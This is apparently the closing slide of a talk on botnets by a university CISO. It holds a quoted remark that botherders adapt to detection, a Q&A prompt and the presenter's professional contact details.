"Botherders are human adversaries, and can respond to detection strategies." David Dagon, 2007

Q&A

Questions?

Craig A Schiller, CISSP-ISSMP, ISSAP
craigs@pdx.edu
Portland State University
CISO